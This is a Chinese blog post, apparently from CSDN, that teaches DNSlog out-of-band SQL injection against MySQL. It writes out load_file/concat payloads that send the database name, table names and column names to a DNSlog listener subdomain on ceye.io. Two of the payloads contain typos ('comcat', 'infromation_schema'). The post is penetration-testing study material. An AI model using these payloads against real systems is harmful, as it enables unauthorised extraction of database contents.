【SQL注入】DNSlog方式

最新推荐文章于 2024-07-06 01:52:44 发布
最新推荐文章于 2024-07-06 01:52:44 发布
阅读量267 收藏 1
点赞数 6
文章标签: 网络 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57347472/article/details/136951292
版权

DNSlog注入也可以称之为dns带外查询,Dns在域名解析时会在DNS服务器上留下域名和解析il的记录,可以在dns服务器上查询相应的dns解析记录,来获取大致原理。

 DNSlog服务器无需自己搭建

http://ceye.io/       知道创宇公司提供的

http://www.dnslog.cn/

http://admin.dnslog.link  

 条件:

  1. 需要mysql用户具备读文件的权限,因为要借助到mysql的load_file读取文件的函数,权限不够的话,不能调用这个函数,只有在mysql配置中开启了secure_file_priv配置,就可以通过sql语句来执行文件读写操作。
  2. 目标mysql数据库能够访问外网
select load_file('\\\\xxx.xxxx.xxx\\xx'); #xxx.xxxx.xxx\\xx是某个网址

此处的路径我们称之为UNC路径

那么我们就可以通过只有的方式然后拼接数据库函数,通过DNSlog获得数据库的信息

select load_file(concat('\\\\',(select database()),'xxxx.xxx.xx\\xxx'))#获取数据库库名字

示例:

上图是创宇公司提供的的DNSlog服务器网址

select load_file(comcat('\\\\',(select database()),'9fqiop.ceye.io\\abc'))#获取数据库名字

获取表名

and (select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'9fqiop.ceye.io\\abc')))

修改limit的数字即可得到其他表名

查询字段名

and (select load_file(concat('\\\\',(select column_name from infromation_schema.columns where table_schema=database() and table_name='member' limit 0,1), '9fqiop.ceye.io\\abc')))

快搞钱
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 339
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
SQL注入DNSLog外带注入
dragon的博客
02-21 2755
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
SQL注入基础入门
最新发布
本散修的一些学习心得与笔记,道友请自便。
07-06 1015
SQL注入是本散修学习过程中和刷CTF题整理的一些心得,现在看来感觉也还是入门,没有涉及到很多进阶的方式,后续有能力的话应该还会继续写一些过waf的进阶操作。
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 729
SQL注入——DNSlog注入
dnslogsql注入
weixin_44894463的博客
07-09 232
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
SQL注入DnsLog注入
qq_52310755的博客
03-22 1987
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL 注入天书.pdf
08-06
Background-2介绍了盲注,这是一种更为隐蔽的注入方式,攻击者在无法直接看到查询结果时,通过判断查询是否成功或执行时间长短来获取信息。Less-5和Less-6进一步阐述了基于时间的盲注和基于布尔值的盲注,以及如何...
pangolinsdl—sql注入工具
06-20
- **查看结果**:扫描完成后,会显示发现的漏洞列表,包括注入点位置、可能的攻击方式等。 - **导出报告**:可以将测试结果保存为文档,供后期分析或分享。 4. **学习资源** - **Pangolin的使用方法教程.doc**:...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
SQL DNSlog注入详解
永远是少年
08-07 1330
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
SQL注入-DNSlog注入(手工加工具使用)
没有
04-17 6780
DNSlog注入
dnslogsql注入中的应用
whatday的专栏
07-23 710
目录 1.DNSLOG的原理 2.Dnslog在常见数据库中SQL注入的实战 1、MySQL 2、msSQL 3、postgreSQL 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时, DNS的解析过程示意图 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
SQL注入DNS_log注入
weixin_47785246的博客
07-11 746
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
WEB安全之:DNSlog SQL 注入
f_carey的博客
06-18 206
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 SQL 注入之:DNSlog 注入1 原理2 利用场景3 前提条件4 平台5 Payloads0x00 命令执行i. *nix:ii. windows0x01 SQL Injectioni. SQL Serverii. Oracleiii. MySQLiv. PostgreSQL0x02 XML Entity .
DnslogSQL注入中的利用
weixin_33754913的博客
07-11 315
参考文献:www.anquanke.com/post/id/98096https://bbs.pediy.com/thread-223881.htm DNSlog在Web攻击的利用 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获得的数据外带出来。 常用...
SQL注入DNSlog注入
zh的博客
10-12 835
靶场地址:http://61.136.208.14:8003/ 解题准备:DNSlog平台 解题思路: 1、根据提示,需要使用dnslog平台进行注入 DNSLog Platform 生成并复制域名 2、然后判断靶场的闭合符 id=1 页面正常 id=1' id=1' --+ 报错 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常 确定没有闭合符,应该是数字型 根据DNSlog注入的通用语句,构建注入语句 ?id=1 and (select load_
mysql-dnslog注入
Adminxe的博客
05-05 1862
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
sql注入外带dnslog
09-11
很抱歉,我不能提供关于SQL注入外带DNS log的任何信息。 SQL注入是一种安全漏洞,允许攻击者通过在应用程序中插入恶意SQL代码来获取未经授权的访问权限或者对数据库进行操纵。这是一种严重的漏洞,应该被尽快修复。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值